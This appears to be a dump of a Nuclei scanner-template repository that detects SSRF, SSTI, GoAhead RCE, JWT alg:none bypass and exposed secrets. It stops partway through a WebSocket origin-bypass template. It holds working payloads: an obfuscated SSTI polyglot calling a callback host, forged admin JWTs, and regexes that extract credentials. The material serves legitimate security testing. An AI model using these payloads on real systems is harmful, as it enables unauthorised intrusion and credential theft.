.Python 97 | build/ 98 | develop-eggs/ 99 | dist/ 100 | downloads/ 101 | eggs/ 102 | .eggs/ 103 | lib/ 104 | lib64/ 105 | parts/ 106 | sdist/ 107 | var/ 108 | wheels/ 109 | *.egg-info/ 110 | .installed.cfg 111 | *.egg 112 | PIPFILE.lock 113 | 114 | # Security and sensitive files 115 | *.key 
116 | *.pem 117 | *.cert 118 | *.crt 119 | *.p12 120 | *.pfx 121 | secrets.yaml 122 | secrets.yml 123 | *.secret 124 | 125 | # Test and coverage reports 126 | coverage/ 127 | .coverage 128 | .pytest_cache/ 129 | .tox/ 130 | .nox/ 131 | htmlcov/ 132 | 133 | # Documentation build 134 | docs/_build/ 135 | site/ 136 | 137 | # Cache directories 138 | .cache/ 139 | .parcel-cache/ 140 | .npm/ 141 | .yarn/ 142 | 143 | # Personal notes and TODO files 144 | TODO.md 145 | NOTES.md 146 | SCRATCH.md 147 | *.notes 148 | 149 | # Nuclei specific 150 | # Exclude potential sensitive test results 151 | test-results/ 152 | reports/ 153 | *.json.bak 154 | *.yaml.bak 155 | *.yml.bak 156 | 157 | # Backup files from editors 158 | *~ 159 | .#* 160 | #*# 161 | 162 | # Non-template trash 163 | *.sh 164 | *.py 165 | *.db 166 | *.json 167 | venv/ 168 | -------------------------------------------------------------------------------- /websocket-upgrade-oob.yaml: -------------------------------------------------------------------------------- 1 | id: websocket-upgrade-oob 2 | 3 | info: 4 | name: WebSocket Upgrade Header Injection OOB Detection 5 | author: geeknik 6 | severity: medium 7 | description: | 8 | Detects WebSocket endpoints that improperly handle Upgrade headers with external URLs, 9 | potentially leading to SSRF through WebSocket-Sec-WebSocket-Protocol or custom headers 10 | that trigger external connections during the WebSocket handshake process. 
11 | reference: 12 | - https://tools.ietf.org/html/rfc6455 13 | - https://portswigger.net/web-security/websockets 14 | - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/10-Testing_WebSockets 15 | classification: 16 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N 17 | cvss-score: 6.1 18 | cwe-id: CWE-918 19 | tags: websocket,oob,ssrf,upgrade,handshake 20 | 21 | variables: 22 | callback_url: "{{interactsh-url}}" 23 | 24 | websocket: 25 | - address: "{{BaseURL}}" 26 | path: 27 | - "/ws" 28 | - "/websocket" 29 | - "/socket.io/" 30 | - "/api/ws" 31 | - "/chat" 32 | - "/live" 33 | - "/stream" 34 | 35 | headers: 36 | Sec-WebSocket-Protocol: "{{callback_url}}" 37 | Sec-WebSocket-Extensions: "permessage-deflate; server_max_window_bits" 38 | Origin: "{{callback_url}}" 39 | 40 | inputs: 41 | - data: | 42 | { 43 | "type": "upgrade_test", 44 | "protocol": "{{callback_url}}", 45 | "callback_url": "{{callback_url}}/websocket-upgrade" 46 | } 47 | - data: | 48 | { 49 | "command": "connect", 50 | "external_protocol": "{{callback_url}}", 51 | "origin": "{{callback_url}}" 52 | } 53 | - data: | 54 | { 55 | "action": "handshake_callback", 56 | "webhook_url": "{{callback_url}}/callback", 57 | "external_origin": "{{callback_url}}" 58 | } 59 | 60 | - address: "{{BaseURL}}" 61 | path: 62 | - "/ws" 63 | - "/websocket" 64 | - "/socket.io/" 65 | - "/api/ws" 66 | 67 | headers: 68 | X-Forwarded-Proto: "{{callback_url}}" 69 | X-WebSocket-Callback: "{{callback_url}}/callback" 70 | X-External-Origin: "{{callback_url}}" 71 | 72 | inputs: 73 | - data: | 74 | { 75 | "type": "protocol_injection", 76 | "forward_to": "{{callback_url}}", 77 | "proxy_target": "{{callback_url}}/proxy" 78 | } 79 | 80 | matchers: 81 | - type: word 82 | part: interactsh_protocol 83 | words: 84 | - "http" 85 | - "dns" 86 | condition: or -------------------------------------------------------------------------------- 
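/tls-pqc-downgrade-attack.yaml: --------------------------------------------------------------------------------
id: tls-pqc-downgrade-attack

info:
  name: TLS Post-Quantum Cryptography Downgrade Attack Detection
  author: geeknik
  severity: medium
  description: |
    Checks whether a TLS endpoint can be talked down to legacy, classical
    parameters.
    Review note - there is no deployed "PQC-only" TLS to downgrade from yet:
    hybrid key exchange (draft-ietf-tls-hybrid-design) is negotiated through
    supported_groups and falls back to classical groups by design. The only
    thing observable from the outside with nuclei's ssl protocol is whether
    the server still accepts TLS 1.0/1.1 when the client offers nothing
    newer, which is what this template now reports (hence severity medium
    rather than high). The HTTP checks below look for self-declared PQC
    policy documents and are informational; no standard defines those
    endpoints or the TLS-* request/response headers.
  reference:
    - https://datatracker.ietf.org/doc/draft-ietf-tls-hybrid-design/
    - https://www.nist.gov/pqcrypto
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 7.4
    cwe-id: CWE-757
  tags: tls,pqc,downgrade,cryptography

ssl:
  - address: "{{Host}}:{{Port}}"

    # Bug fix: the client previously offered up to TLS 1.3, so a modern server
    # simply picked 1.3 and the tls10/tls11 matcher could never fire. Capping
    # the offer at TLS 1.1 makes this an actual "does the server accept a
    # downgraded client" probe.
    min_version: tls10
    max_version: tls11

    cipher_suites:
      # Classical suites as in the original list. The two GCM suites are
      # TLS 1.2-only and are ignored at the versions offered above.
      - "TLS_RSA_WITH_AES_128_CBC_SHA"
      - "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"
      - "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"

    matchers:
      # The former "classical cipher negotiated" matcher (TLS_RSA / TLS_ECDHE)
      # was removed: every production server negotiates a classical suite
      # today, so it flagged essentially every host as high.
      - type: dsl
        dsl:
          - "tls_version == 'tls10' || tls_version == 'tls11'"

http:
  # Informational: self-published PQC policy documents. None of these paths
  # is defined by any standard, so expect few hits.
  - method: GET
    path:
      - "{{BaseURL}}/.well-known/pqc-policy"
      - "{{BaseURL}}/api/tls/config"
      - "{{BaseURL}}/security/tls"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "kyber"
          - "dilithium"
          - "falcon"
          - "sphincs"
        condition: or

      - type: word
        words:
          - '"fallback":true'
          - '"allow_classical":true'
          - '"downgrade_permitted":true'
        condition: or

  # The TLS-Client-* / TLS-Server-* headers are not part of TLS or HTTP --
  # group and signature negotiation happens in the handshake, not in headers.
  # Only a custom server would echo them, so this request is a long shot and
  # can never evidence a handshake-level downgrade.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        TLS-Client-Supported-Groups: x25519_kyber768
        TLS-Client-Signature-Algorithms: dilithium3

    matchers:
      - type: regex
        part: header
        regex:
          - 'TLS-Server-Selected-Group:\s*(x25519|secp256r1|secp384r1)'
          - 'TLS-Server-Signature-Algorithm:\s*(rsa|ecdsa)'
        condition: or

-------------------------------------------------------------------------------- /ssti-polyglot-multi-engine-oob.yaml: --------------------------------------------------------------------------------
id: ssti-polyglot-multi-engine-oob

info:
  name: Server-Side Template Injection - Polyglot Multi-Engine OOB Detection
  author: geeknik
  severity: high
  description: |
    Detects Server-Side Template Injection vulnerabilities across multiple template engines
    using polyglot payloads with OOB confirmation for enhanced accuracy.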
10 | reference: 11 | - https://portswigger.net/web-security/server-side-template-injection 12 | - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection 13 | classification: 14 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 15 | cvss-score: 9.8 16 | cwe-id: CWE-94,CWE-95 17 | tags: ssti,template-injection,oob,polyglot 18 | 19 | variables: 20 | callback_url: "{{interactsh-url}}" 21 | engine_id: "{{randstr}}" 22 | 23 | http: 24 | - method: GET 25 | path: 26 | - "{{BaseURL}}" 27 | - "{{BaseURL}}/search" 28 | - "{{BaseURL}}/contact" 29 | 30 | payloads: 31 | param: 32 | - "q" 33 | - "search" 34 | - "query" 35 | - "name" 36 | - "message" 37 | 38 | raw: 39 | - | 40 | GET {{path}}?{{param}}={{url_encode("<%=7*7%>#{7*7}${7*7}[%7*7%]constructor.constructor(String.fromCharCode(108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47)+\"{{callback_url}}/ssti-{{engine_id}}\"+String.fromCharCode(34))()")}} HTTP/1.1 41 | Host: {{Hostname}} 42 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 43 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 44 | Connection: close 45 | 46 | - method: POST 47 | path: 48 | - "{{BaseURL}}/search" 49 | - "{{BaseURL}}/contact" 50 | 51 | headers: 52 | Content-Type: application/x-www-form-urlencoded 53 | 54 | payloads: 55 | param: 56 | - "q" 57 | - "query" 58 | - "message" 59 | 60 | body: "{{param}}={{url_encode(\"<%=7*7%>#{7*7}${7*7}[%7*7%]constructor.constructor(String.fromCharCode(108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47)+\\\"{{callback_url}}/ssti-{{engine_id}}\\\"+String.fromCharCode(34))()\"))}}" 61 | 62 | matchers-condition: and 63 | matchers: 64 | - type: word 65 | part: interactsh_protocol 66 | words: 67 | - "http" 68 | - "dns" 69 | condition: or 70 | 71 | - type: word 72 | part: interactsh_request 73 | words: 74 | - "ssti-" 75 | 76 | extractors: 77 | 
- type: regex
  # Pulls the per-engine marker back out of the callback request so a hit can be
  # tied to the exact probe that fired it.
  part: interactsh_request
  regex:
    - "/ssti-([a-z0-9]+)"
  group: 1
--------------------------------------------------------------------------------
/CVE-2017-17562.yaml:
--------------------------------------------------------------------------------
id: CVE-2017-17562

info:
  name: Embedthis GoAhead RCE
  description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.
  author: geeknik
  # REVIEW: the `|` block scalar makes `reference` ONE literal string (with the
  # "- " prefixes inside it) rather than a list of URLs. Drop the `|` so it is a
  # plain list, as every other template in this set writes it.
  reference: |
    - https://www.elttam.com/blog/goahead/
    - https://github.com/ivanitlearning/CVE-2017-17562
    - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
  severity: high
  tags: cve,cve2017,rce,embedthis,goahead,fuzz

# REVIEW: `requests:` and the `§endpoint§` payload markers are legacy nuclei
# syntax; the other templates here use `http:` and `{{endpoint}}`. Run
# `nuclei -validate` on this file before relying on it. No `metadata.max-request`
# is declared either, although 65 endpoints means 65 requests per target.
requests:
  - payloads:
      # CGI program names tried under /cgi-bin/ — one request per entry (batteringram).
      endpoint:
        - admin
        - apply
        - non-CA-rev
        - cgitest
        - checkCookie
        - check_user
        - chn/liveView
        - cht/liveView
        - cnswebserver
        - config
        - configure/set_link_neg
        - configure/swports_adjust
        - eng/liveView
        - firmware
        - getCheckCode
        - get_status
        - getmac
        - getparam
        - guest/Login
        - home
        - htmlmgr
        - index
        - index/login
        - jscript
        - kvm
        - liveView
        - login
        - login.asp
        - login/login
        - login/login-page
        - login_mgr
        - luci
        - main
        - main-cgi
        - manage/login
        - menu
        - mlogin
        - netbinary
        - nobody/Captcha
        - nobody/VerifyCode
        - normal_userLogin
        - otgw
        - page
        - rulectl
        - service
        - set_new_config
        - sl_webviewer
        - ssi
        - status
        - sysconf
        - systemutil
        - t/out
        - top
        - unauth
        - upload
        - variable
        - wanstatu
        - webcm
        - webmain
        - webproc
        - webscr
        - webviewLogin
        - webviewLogin_m64
        - webviewer
        - welcome
    raw:
      - |
        GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
        Accept: */*
        Connection: close

    attack: batteringram
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      # Both phrases are taken from glibc's LD_DEBUG=help output; a 200 body that
      # carries them shows the query-string variable reached the CGI process's
      # environment, which is the precondition the CVE describes. Benign
      # detection: no code is executed by this probe.
      - type: word
        words:
          - "environment variable"
          - "display library search paths"
        condition: and
--------------------------------------------------------------------------------
/websocket-relay-oob.yaml:
--------------------------------------------------------------------------------
id: websocket-relay-oob

info:
  name: WebSocket Message Relay OOB Detection
  author: geeknik
  severity: high
  description: |
    Detects WebSocket endpoints that relay or proxy messages to external services,
    potentially allowing SSRF through WebSocket message forwarding, bridge connections,
    or relay functionality that can be abused to reach internal services.
  reference:
    - https://portswigger.net/web-security/websockets/what-are-websockets
    - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/10-Testing_WebSockets
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 8.2
    cwe-id: CWE-918
  tags: websocket,oob,ssrf,relay,proxy,bridge

variables:
  # REVIEW: `{{interactsh-url}}` expands to a bare hostname (templates normally
  # write `http://{{interactsh-url}}`). Most JSON fields below hand it to the
  # target as a URL with no scheme, which a strict URL parser rejects before any
  # outbound request is made — prefix `http://` where a URL is expected.
  callback_url: "{{interactsh-url}}"

websocket:
  - address: "{{BaseURL}}"
    # REVIEW: confirm `path` is honoured under a websocket request
    # (`nuclei -validate`); websocket-auth-bypass-real.yaml in this set puts the
    # path into `address` instead, and the two styles should agree.
    path:
      - "/ws"
      - "/websocket"
      - "/socket.io/"
      - "/api/ws"
      - "/bridge"
      - "/tunnel"

    # Three guessed relay/bridge message shapes; none carries a per-message
    # marker, so a callback cannot be attributed to the input that caused it.
    inputs:
      - data: |
          {
            "type": "relay",
            "target": "{{callback_url}}",
            "relay_to": "{{callback_url}}/endpoint",
            "forward_url": "{{callback_url}}/webhook"
          }
      - data: |
          {
            "action": "message_relay",
            "relay_config": {
              "url": "{{callback_url}}",
              "method": "GET",
              "headers": {"User-Agent": "WebSocket-Relay"}
            }
          }
      - data:
| 51 | { 52 | "command": "bridge_setup", 53 | "bridge_config": { 54 | "upstream": "{{callback_url}}", 55 | "downstream": "ws://{{callback_url}}/ws", 56 | "proxy_headers": true 57 | } 58 | } 59 | 60 | - address: "{{BaseURL}}" 61 | path: 62 | - "/ws/proxy" 63 | - "/websocket/forward" 64 | - "/api/ws/tunnel" 65 | 66 | inputs: 67 | - data: | 68 | { 69 | "type": "proxy_config", 70 | "proxy_target": "{{callback_url}}", 71 | "webhook_url": "{{callback_url}}/callback", 72 | "forward_all": true, 73 | "external_relay": "{{callback_url}}/relay" 74 | } 75 | - data: | 76 | { 77 | "action": "external_connect", 78 | "external_ws": "wss://{{callback_url}}/ws", 79 | "relay_messages": true, 80 | "callback_on_connect": "{{callback_url}}/connected" 81 | } 82 | - data: | 83 | { 84 | "command": "tunnel_create", 85 | "tunnel_target": "{{callback_url}}", 86 | "callback_url": "{{callback_url}}/tunnel-ready" 87 | } 88 | 89 | matchers: 90 | - type: word 91 | part: interactsh_protocol 92 | words: 93 | - "http" 94 | - "dns" 95 | condition: or -------------------------------------------------------------------------------- /php-config-backup-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: php-config-backup-exposure 2 | 3 | info: 4 | name: PHP Configuration Backup File Exposure 5 | author: geeknik 6 | severity: high 7 | description: | 8 | Detects exposed PHP configuration backup files that may contain 9 | database credentials, API keys, and other sensitive configuration data. 
reference:
  - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/
tags: config,backup,php,exposure

# REVIEW: legacy `requests:` key; the other templates in this set use `http:`.
requests:
  - method: GET
    path:
      # Common PHP config backup patterns
      - "{{BaseURL}}/config.php.bak"
      - "{{BaseURL}}/config.php.old"
      - "{{BaseURL}}/config.php.backup"
      - "{{BaseURL}}/config.php~"
      - "{{BaseURL}}/config.inc.php.bak"
      - "{{BaseURL}}/config.inc.php.old"
      - "{{BaseURL}}/config.inc.php.backup"
      - "{{BaseURL}}/configuration.php.bak"
      - "{{BaseURL}}/wp-config.php.bak"
      - "{{BaseURL}}/wp-config.php.old"
      - "{{BaseURL}}/database.php.bak"
      - "{{BaseURL}}/db.php.bak"
      - "{{BaseURL}}/settings.php.bak"
      # Editor swap files are a binary format; the `<?php` / `$` word checks
      # below can still hit because the source text is embedded verbatim.
      - "{{BaseURL}}/.config.php.swp"
      - "{{BaseURL}}/.config.inc.php.swp"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # Must contain PHP code
      - type: word
        words:
          - "<?php"
          - "$"
        condition: and

      # Must contain actual configuration data - using word matching to avoid regex issues
      - type: word
        words:
          - "$db_password"
          - "$database_password"
          - "$db_pass"
          - "$mysql_password"
          - "$DB_PASSWORD"
          - "DB_PASSWORD"
          - "$api_key"
          - "$API_KEY"
          - "$secret_key"
          - "define("
        condition: or

      # Must have assignment operators
      # (satisfied by any file that already passed the `<?php` check; harmless but adds nothing)
      - type: word
        words:
          - "="
          - "=>"

      # Exclude empty configs and placeholders
      # REVIEW: these are whole-body substrings — a single "TODO" comment anywhere
      # in a real config suppresses the finding. Scope the placeholder test to the
      # credential values the extractor pulls out rather than the entire body.
      - type: word
        words:
          - "your_password_here"
          - "changeme"
          - "xxxxxx"
          - "TODO"
          - "PLACEHOLDER"
        negative: true

      # Not an HTML error page
      # REVIEW: this suppresses true positives. Servers have no MIME type for
      # `.bak`/`.old`/`~`/`.swp` and send their configured default type, which is
      # often text/html; the `<?php` body check above already excludes real HTML
      # error pages, so this header test should be removed.
      - type: word
        part: header
        words:
          - "text/html"
        negative: true

      # Reasonable file size
      - type: dsl
        dsl:
          - "len(body) > 100 && len(body) < 524288"

extractors: 92 | - type: regex 93 | name: credentials 94 | regex: 95 | - 'password.{0,5}=.{0,5}["\''](.+?)["\'']' 96 | - 'DB_PASSWORD.{0,5},.{0,5}["\''](.+?)["\'']' 97 | - 'api_key.{0,5}=.{0,5}["\'']([a-zA-Z0-9_\-]{20,})["\'']' 98 | group: 1 -------------------------------------------------------------------------------- /jwt-algorithm-confusion.yaml: -------------------------------------------------------------------------------- 1 | id: jwt-algorithm-confusion 2 | info: 3 | name: JWT Algorithm Confusion Attack Detection 4 | author: geeknik 5 | severity: critical 6 | description: | 7 | Detects JWT implementations vulnerable to algorithm confusion attacks including 8 | alg:none bypass, RSA to HMAC downgrade, and key confusion vulnerabilities. 9 | reference: 10 | - https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/ 11 | - https://portswigger.net/web-security/jwt/algorithm-confusion 12 | classification: 13 | cwe-id: CWE-347 14 | tags: jwt,authentication,bypass,critical 15 | metadata: 16 | max-request: 6 17 | 18 | variables: 19 | test_payload: "test_user_{{randstr}}" 20 | 21 | requests: 22 | - raw: 23 | - | 24 | GET {{BaseURL}}/api/user HTTP/1.1 25 | Host: {{Hostname}} 26 | Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTYxNjIzOTAyMiwiZXhwIjo5OTk5OTk5OTk5fQ. 27 | 28 | - | 29 | GET {{BaseURL}}/api/user HTTP/1.1 30 | Host: {{Hostname}} 31 | Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImV4cCI6OTk5OTk5OTk5OX0. 
# REVIEW: the HS256 signature below is a fixed, arbitrary value, so this request
# can only show that the signature is not checked at all. A genuine RSA->HMAC
# confusion test needs the target's own public key as the HMAC secret, which this
# template never fetches; narrow the description's claim or add that step.
- |
  GET {{BaseURL}}/api/user HTTP/1.1
  Host: {{Hostname}}
  Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTYxNjIzOTAyMiwiZXhwIjo5OTk5OTk5OTk5fQ.YTVmNjRhYzU2NzY4ZjQ5ZGJmNzU0ZWM0YzU1MzU0YzA3YmU5NTU0ZGJmNzU0ZWM0YzU1MzU0YzA3YmU5NTU0ZA

# The remaining probes reuse the first alg:none token against guessed profile
# paths; they differ only in path, not in token.
- |
  GET {{BaseURL}}/api/profile HTTP/1.1
  Host: {{Hostname}}
  Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTYxNjIzOTAyMiwiZXhwIjo5OTk5OTk5OTk5fQ.

- |
  GET {{BaseURL}}/api/admin HTTP/1.1
  Host: {{Hostname}}
  Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTYxNjIzOTAyMiwiZXhwIjo5OTk5OTk5OTk5fQ.

- |
  GET {{BaseURL}}/api/me HTTP/1.1
  Host: {{Hostname}}
  Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiIsImlhdCI6MTYxNjIzOTAyMiwiZXhwIjo5OTk5OTk5OTk5fQ.

stop-at-first-match: true

# REVIEW: nothing here proves a bypass. A 200 whose body contains `"id"`,
# `"user"` or `"email"` describes almost any JSON response from a public
# endpoint, yet it is reported as critical. Add an unauthenticated baseline
# request (no Authorization header) and gate the finding on the token response
# differing from it — `status_code_N` comparisons in a dsl matcher, as
# http3-quic-smuggling.yaml in this set does.
matchers-condition: and
matchers:
  - type: status
    status:
      - 200

  - type: word
    part: body
    words:
      - '"admin"'
      - '"role"'
      - '"user"'
      - '"email"'
      - '"id"'
    condition: or

  - type: word
    part: body
    words:
      - "Unauthorized"
      - "Invalid token"
      - "Authentication failed"
      - "Access denied"
    negative: true

extractors:
  - type: regex
    part: body
    regex:
      - '"role":\s*"([^"]+)"'
      - '"username":\s*"([^"]+)"'
      - '"email":\s*"([^"]+)"'
--------------------------------------------------------------------------------
/websocket-auth-bypass-oob.yaml:
--------------------------------------------------------------------------------
id: websocket-auth-bypass-oob

info:
  name: WebSocket Authentication Bypass External Callback OOB
  author: geeknik
  severity: high
  description: |
    Detects WebSocket
authentication mechanisms that can be bypassed through external 9 | callback URLs, JWT validation endpoints, OAuth redirects, or authentication 10 | delegation to external services that can be controlled by an attacker. 11 | reference: 12 | - https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking 13 | - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/ 14 | - https://tools.ietf.org/html/rfc6455#section-10 15 | classification: 16 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N 17 | cvss-score: 9.3 18 | cwe-id: CWE-287 19 | tags: websocket,oob,auth-bypass,jwt,oauth,delegation 20 | 21 | variables: 22 | callback_url: "{{interactsh-url}}" 23 | 24 | websocket: 25 | - address: "{{BaseURL}}" 26 | path: 27 | - "/ws" 28 | - "/websocket" 29 | - "/socket.io/" 30 | - "/api/ws" 31 | 32 | inputs: 33 | - data: | 34 | { 35 | "type": "auth", 36 | "auth_type": "external", 37 | "validation_url": "{{callback_url}}/validate", 38 | "callback_url": "{{callback_url}}/auth-success" 39 | } 40 | - data: | 41 | { 42 | "action": "jwt_auth", 43 | "jwt_issuer": "{{callback_url}}", 44 | "validation_endpoint": "{{callback_url}}/jwt/validate", 45 | "jwks_uri": "{{callback_url}}/.well-known/jwks.json" 46 | } 47 | - data: | 48 | { 49 | "command": "oauth_setup", 50 | "oauth_provider": "{{callback_url}}", 51 | "authorization_url": "{{callback_url}}/oauth/authorize", 52 | "token_url": "{{callback_url}}/oauth/token", 53 | "redirect_uri": "{{callback_url}}/oauth/callback" 54 | } 55 | 56 | - address: "{{BaseURL}}" 57 | path: 58 | - "/ws/auth" 59 | - "/websocket/authenticate" 60 | - "/api/ws/login" 61 | 62 | inputs: 63 | - data: | 64 | { 65 | "type": "delegate_auth", 66 | "auth_delegate": "{{callback_url}}/auth", 67 | "user_info_url": "{{callback_url}}/userinfo", 68 | "trust_external": true, 69 | "callback_on_success": "{{callback_url}}/authenticated" 70 | } 71 | - data: | 72 | { 73 | "action": 
"saml_auth", 74 | "saml_idp": "{{callback_url}}", 75 | "sso_url": "{{callback_url}}/saml/sso", 76 | "metadata_url": "{{callback_url}}/saml/metadata", 77 | "acs_url": "{{callback_url}}/saml/acs" 78 | } 79 | - data: | 80 | { 81 | "command": "bypass_auth", 82 | "external_validator": "{{callback_url}}/bypass", 83 | "callback_url": "{{callback_url}}/bypassed" 84 | } 85 | 86 | matchers: 87 | - type: word 88 | part: interactsh_protocol 89 | words: 90 | - "http" 91 | - "dns" 92 | condition: or -------------------------------------------------------------------------------- /sensitive-config-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: sensitive-config-exposure 2 | 3 | info: 4 | name: Sensitive Configuration File Exposure Detection 5 | author: geeknik 6 | severity: high 7 | description: | 8 | Detects exposed configuration files containing actual secrets, API keys, 9 | database credentials, and other sensitive information with high-confidence 10 | pattern matching to reduce false positives. 
11 | reference: 12 | - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/ 13 | classification: 14 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 15 | cvss-score: 7.5 16 | cwe-id: CWE-200,CWE-213 17 | tags: config,exposure,secrets,credentials 18 | 19 | http: 20 | - method: GET 21 | path: 22 | - "{{BaseURL}}/config.js" 23 | - "{{BaseURL}}/config.json" 24 | - "{{BaseURL}}/settings.js" 25 | - "{{BaseURL}}/settings.json" 26 | - "{{BaseURL}}/app.config.js" 27 | - "{{BaseURL}}/.env.js" 28 | - "{{BaseURL}}/env.js" 29 | - "{{BaseURL}}/api/config" 30 | - "{{BaseURL}}/api/settings" 31 | 32 | matchers-condition: and 33 | matchers: 34 | - type: status 35 | status: 36 | - 200 37 | 38 | # Must have valid config structure 39 | - type: regex 40 | regex: 41 | - '(const|let|var|export|module\.exports)\s*=\s*\{' # JS config object 42 | - '^\s*\{[\s\S]*\}\s*$' # JSON object 43 | condition: or 44 | 45 | # Must contain actual secrets (high-confidence patterns) 46 | - type: regex 47 | regex: 48 | # AWS credentials 49 | - 'AKIA[0-9A-Z]{16}' 50 | - 'aws_secret_access_key["\s]*[:=]["\s]*[a-zA-Z0-9/+=]{40}' 51 | 52 | # API keys with entropy validation 53 | - 'api[_-]?key["\s]*[:=]["\s]*[a-zA-Z0-9]{32,}' 54 | - 'secret[_-]?key["\s]*[:=]["\s]*[a-zA-Z0-9]{32,}' 55 | 56 | # Database URLs with credentials 57 | - 'mongodb(\+srv)?://[^:]+:[^@]+@[^/]+/' 58 | - 'postgres://[^:]+:[^@]+@[^/]+/' 59 | - 'mysql://[^:]+:[^@]+@[^/]+/' 60 | 61 | # OAuth secrets 62 | - 'client_secret["\s]*[:=]["\s]*[a-zA-Z0-9_-]{32,}' 63 | 64 | # Private keys 65 | - '-----BEGIN (RSA |EC |DSA )?PRIVATE KEY-----' 66 | 67 | # JWT secrets 68 | - 'jwt[_-]?secret["\s]*[:=]["\s]*[a-zA-Z0-9_-]{16,}' 69 | condition: or 70 | 71 | # Exclude common false positives 72 | - type: word 73 | words: 74 | - "EXAMPLE_API_KEY" 75 | - "YOUR_API_KEY_HERE" 76 | - "placeholder" 77 | - "TODO" 78 | - "<html" 79 | - "<!DOCTYPE" 80 | negative: 
true 81 | 82 | extractors: 83 | - type: regex 84 | name: aws_key 85 | regex: 86 | - 'AKIA[0-9A-Z]{16}' 87 | 88 | - type: regex 89 | name: database_url 90 | regex: 91 | - '(mongodb|postgres|mysql)://[^:]+:[^@]+@[^/]+/[^\s"]*' 92 | 93 | - type: regex 94 | name: api_key 95 | regex: 96 | - '(api[_-]?key)["\s]*[:=]["\s]*([a-zA-Z0-9_-]{32,})' 97 | group: 2 -------------------------------------------------------------------------------- /websocket-origin-bypass-oob.yaml: -------------------------------------------------------------------------------- 1 | id: websocket-origin-bypass-oob 2 | 3 | info: 4 | name: WebSocket Origin Validation Bypass OOB Detection 5 | author: geeknik 6 | severity: high 7 | description: | 8 | Detects WebSocket endpoints with weak origin validation that can be bypassed 9 | to establish cross-origin connections and trigger external callbacks through 10 | origin spoofing, subdomain takeover scenarios, or referer manipulation. 11 | reference: 12 | - https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking 13 | - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/10-Testing_WebSockets 14 | - https://christian-schneider.net/CrossSiteWebSocketHijacking.html 15 | classification: 16 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N 17 | cvss-score: 8.1 18 | cwe-id: CWE-346 19 | tags: websocket,oob,csrf,origin-bypass,cross-origin 20 | 21 | variables: 22 | callback_url: "{{interactsh-url}}" 23 | 24 | websocket: 25 | - address: "{{BaseURL}}" 26 | path: 27 | - "/ws" 28 | - "/websocket" 29 | - "/socket.io/" 30 | - "/api/ws" 31 | 32 | headers: 33 | Origin: "{{callback_url}}" 34 | Referer: "{{callback_url}}/ws-client" 35 | 36 | inputs: 37 | - data: | 38 | { 39 | "type": "origin_test", 40 | "callback_url": "{{callback_url}}/origin-bypass", 41 | "external_origin": "{{callback_url}}" 42 | } 43 | - data: | 44 | { 45 | "action": "cross_origin_check", 46 | "origin": 
